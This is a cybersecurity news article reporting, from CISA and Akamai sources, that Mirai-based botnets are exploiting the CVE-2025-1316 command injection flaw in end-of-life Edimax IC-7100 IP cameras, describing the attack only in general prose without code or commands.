Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras

Pierluigi Paganini
March 07, 2025

Mirai-based botnets are exploiting a zero-day flaw, tracked as CVE-2025-1316, in Edimax IP cameras, to achieve remote command execution.

US CISA warns that multiple botnets are exploiting a recently disclosed vulnerability, tracked as CVE-2025-1316 (CVSS score of 9.8), in Edimax IC-7100 IP cameras.

The issue is an Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’.

Edimax IC-7100 fails to properly sanitize requests, an attacker can create specially crafted requests to achieve remote code execution on the device. Report suspected malicious activity to CISA for tracking and correlation with other incidents.

“Successful exploitation of this vulnerability could allow an attacker to send specially crafted requests to achieve remote code execution on the device.” reads the advisory published by CISA. “Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.”

The flaw impacts all C-7100 IP Camera versions and has yet to address the vulnerability because these cameras are end-of-life products.

The advisory doesn’t confirm exploitation of the flaw in the wild, however, the USE agency urges organizations to report suspected malicious activity for tracking and correlation.

Akamai researchers discovered the vulnerability, and the cyber security firm confirmed ([1],[2]) that the flaw is actively exploited in the wild.

The experts observed multiple Mirai-based botnets that are currently exploiting multiple flaws, including Edimax IC-7100 IP cameras.

Threat actors exploit remote command execution to run a shell script that downloads a Mirai malware payload from a remote server.

The vendor, notified in Oct 2024, has been unresponsive to CISA and Akamai. Akamai warns that the vulnerability may affect supported ones.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, US CISA)

Trending Now

Got Enough Monitors? – Black Hills Information Security

Ten Tips for Protecting Your Personally Identifiable Information

ReliaQuest Receives National Award for Volunteer Service from Junior Achievement

Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras

Undocumented hidden feature found in Espressif ESP32 microchip

SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 36

Security Affairs newsletter Round 514 by Pierluigi Paganini – INTERNATIONAL EDITION

Latest Posts

US cities warn of wave of unpaid parking phishing texts

Forwarding Traffic Through SSH – Black Hills Information Security

Empowering organizations to protect critical infrastructure with advanced OT network monitoring for cyber threat defense

Popular Posts

US cities warn of wave of unpaid parking phishing texts

The Future of AI and ML in Cybersecurity: What\’s Next?

AI and ML in Cybersecurity: Exploring the Emerging Trends and Future Directions

Trending Now

Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras

Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras

Mirai-based botnets are exploiting a zero-day flaw, tracked as CVE-2025-1316, in Edimax IP cameras, to achieve remote command execution.

Related Posts